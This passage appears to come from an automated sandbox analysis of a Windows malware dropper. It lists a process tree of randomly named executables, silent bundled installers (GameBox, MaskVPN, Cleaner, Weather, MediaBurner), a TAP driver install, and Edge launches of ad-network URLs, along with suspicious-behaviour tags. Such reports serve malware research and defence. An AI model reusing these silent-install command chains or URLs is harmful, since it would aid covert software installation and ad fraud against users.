- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4336

C:\Users\Admin\Documents\ACRS_7uZWaTP54klYeVeFN9k.exe
C:\Users\Admin\Documents\ACRS_7uZWaTP54klYeVeFN9k.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2716

C:\Users\Admin\Documents\083SMkqix3FqkMg85qpCK4MO.exe
"C:\Users\Admin\Documents\083SMkqix3FqkMg85qpCK4MO.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3472

C:\Users\Admin\Documents\OgKA_pM_PTN4I5VVgtdfwxiQ.exe
"C:\Users\Admin\Documents\OgKA_pM_PTN4I5VVgtdfwxiQ.exe"
2⤵
- Executes dropped EXE
PID:3208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 256
3⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2064

C:\Users\Admin\Documents\yRMdFeafclg2dc1Ry1n9sNsz.exe
"C:\Users\Admin\Documents\yRMdFeafclg2dc1Ry1n9sNsz.exe"
2⤵
- Executes dropped EXE
PID:4480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4480 -s 288
3⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4752

C:\Users\Admin\Documents\IvsD8YnAp3LIEOWcKnb759Xn.exe
"C:\Users\Admin\Documents\IvsD8YnAp3LIEOWcKnb759Xn.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3000

C:\Users\Admin\Documents\IvsD8YnAp3LIEOWcKnb759Xn.exe
"C:\Users\Admin\Documents\IvsD8YnAp3LIEOWcKnb759Xn.exe" -q
3⤵
- Executes dropped EXE
PID:2704

C:\Users\Admin\Documents\B1DSbHQ4kUH40QHuC2yUXfLG.exe
"C:\Users\Admin\Documents\B1DSbHQ4kUH40QHuC2yUXfLG.exe"
2⤵
- Executes dropped EXE
PID:3632

C:\Users\Admin\AppData\Local\Temp\is-PVJ7C.tmp\B1DSbHQ4kUH40QHuC2yUXfLG.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PVJ7C.tmp\B1DSbHQ4kUH40QHuC2yUXfLG.tmp" /SL5="$10208,138429,56832,C:\Users\Admin\Documents\B1DSbHQ4kUH40QHuC2yUXfLG.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3844

C:\Users\Admin\AppData\Local\Temp\is-3L9A0.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-3L9A0.tmp\Setup.exe" /Verysilent
4⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5200

C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
5⤵
- Executes dropped EXE
PID:5620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 292
6⤵
- Executes dropped EXE
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1208

C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
5⤵
- Executes dropped EXE
PID:5672

C:\Users\Admin\AppData\Local\Temp\is-SITR8.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SITR8.tmp\Inlog.tmp" /SL5="$40306,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
6⤵
PID:5920

C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:5864

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629407960 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
6⤵
PID:6272

C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
5⤵
- Executes dropped EXE
PID:6016

C:\Users\Admin\AppData\Local\Temp\is-U8M43.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-U8M43.tmp\VPN.tmp" /SL5="$103D0,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5252

C:\Users\Admin\AppData\Local\Temp\is-ILNHN.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-ILNHN.tmp\Setup.exe" /silent /subid=720
7⤵
PID:5604

C:\Users\Admin\AppData\Local\Temp\is-NBRL8.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NBRL8.tmp\Setup.tmp" /SL5="$50330,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-ILNHN.tmp\Setup.exe" /silent /subid=720
8⤵
PID:6248

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
9⤵
PID:6132

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
10⤵
PID:4172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
9⤵
PID:1604

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
10⤵
PID:7096

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
9⤵
PID:6972

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5920

C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
5⤵
- Executes dropped EXE
PID:5960

C:\Users\Admin\AppData\Local\Temp\is-6ED62.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6ED62.tmp\WEATHER Manager.tmp" /SL5="$103BE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4936

C:\Users\Admin\AppData\Local\Temp\is-88DMU.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-88DMU.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
7⤵
PID:5612

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-88DMU.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-88DMU.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629407960 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
8⤵
PID:5048

C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
5⤵
PID:5328

C:\Users\Admin\AppData\Roaming\4549539.exe
"C:\Users\Admin\AppData\Roaming\4549539.exe"
6⤵
PID:5388

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5388 -s 2344
7⤵
- Program crash
PID:2860

C:\Users\Admin\AppData\Roaming\6922648.exe
"C:\Users\Admin\AppData\Roaming\6922648.exe"
6⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious behavior: SetClipboardViewer
PID:4584

C:\Users\Admin\AppData\Roaming\3939471.exe
"C:\Users\Admin\AppData\Roaming\3939471.exe"
6⤵
PID:4112

C:\Users\Admin\AppData\Roaming\7202205.exe
"C:\Users\Admin\AppData\Roaming\7202205.exe"
6⤵
PID:2476

C:\Users\Admin\AppData\Roaming\7760695.exe
"C:\Users\Admin\AppData\Roaming\7760695.exe"
6⤵
PID:3536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3536 -s 2200
7⤵
- Program crash
PID:6556

C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
5⤵
PID:5240

C:\Users\Admin\AppData\Local\Temp\is-9RTFA.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9RTFA.tmp\MediaBurner2.tmp" /SL5="$20332,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5896

C:\Users\Admin\AppData\Local\Temp\is-M37R0.tmp\3377047_logo_media.exe
"C:\Users\Admin\AppData\Local\Temp\is-M37R0.tmp\3377047_logo_media.exe" /S /UID=burnerch2
7⤵
PID:5680

C:\Program Files\Windows Mail\IPMLPMCKZP\ultramediaburner.exe
"C:\Program Files\Windows Mail\IPMLPMCKZP\ultramediaburner.exe" /VERYSILENT
8⤵
PID:2592

C:\Users\Admin\AppData\Local\Temp\is-FGA2Q.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FGA2Q.tmp\ultramediaburner.tmp" /SL5="$5024A,281924,62464,C:\Program Files\Windows Mail\IPMLPMCKZP\ultramediaburner.exe" /VERYSILENT
9⤵
PID:2544

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
10⤵
PID:256

C:\Users\Admin\AppData\Local\Temp\a7-9e6e1-ca6-a8787-26fe4dbf5d49d\Bigiluqenae.exe
"C:\Users\Admin\AppData\Local\Temp\a7-9e6e1-ca6-a8787-26fe4dbf5d49d\Bigiluqenae.exe"
8⤵
PID:7416

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
9⤵
PID:5984

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9c7fe46f8,0x7ff9c7fe4708,0x7ff9c7fe4718
10⤵
PID:7668

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3
10⤵
PID:820

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 820 -s 1904
11⤵
- Program crash
PID:5464

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2604 /prefetch:8
10⤵
PID:4084

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2252 /prefetch:2
10⤵
PID:5532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
10⤵
PID:7272

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
10⤵
PID:4840

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:1
10⤵
PID:3952

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:1
10⤵
PID:1520

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4576 /prefetch:1
10⤵
PID:4632

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4128 /prefetch:1
10⤵
PID:5528

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5636 /prefetch:8
10⤵
PID:3320

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5636 /prefetch:8
10⤵
PID:6396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5116 /prefetch:2
10⤵
PID:7344

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
10⤵
PID:3552

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4240 /prefetch:1
10⤵
PID:7068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1936 /prefetch:1
10⤵
PID:5060

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1
10⤵
PID:4836

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
10⤵
PID:1392

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:1
10⤵
PID:6796

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1
10⤵
PID:2560

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6448 /prefetch:3
10⤵
PID:7860

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 7860 -s 1800
11⤵
- Program crash
PID:3084

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:1
10⤵
PID:2156

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6552 /prefetch:3
10⤵
PID:6980

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6980 -s 1640
11⤵
- Program crash
PID:5744

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
10⤵
PID:6984

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4304 /prefetch:1
10⤵
PID:4324

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6320 /prefetch:1
10⤵
PID:3584

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3352 /prefetch:3
10⤵
PID:2796

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6576 /prefetch:1
10⤵
PID:2196

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6212 /prefetch:1
10⤵
PID:4072

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4388 /prefetch:1
10⤵
PID:6920

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:1
10⤵
PID:5056

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1
10⤵
PID:2440

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4432 /prefetch:1
10⤵
PID:5412

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3832 /prefetch:1
10⤵
PID:4956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:1
10⤵
PID:5580

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
10⤵
PID:1060

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2236,17342081993707123293,394239709595392437,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6004 /prefetch:8
10⤵
PID:6392

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
9⤵
PID:2212

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1e4,0x1e8,0x1ec,0x1c0,0x1f0,0x7ff9c7fe46f8,0x7ff9c7fe4708,0x7ff9c7fe4718
10⤵
PID:1276

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
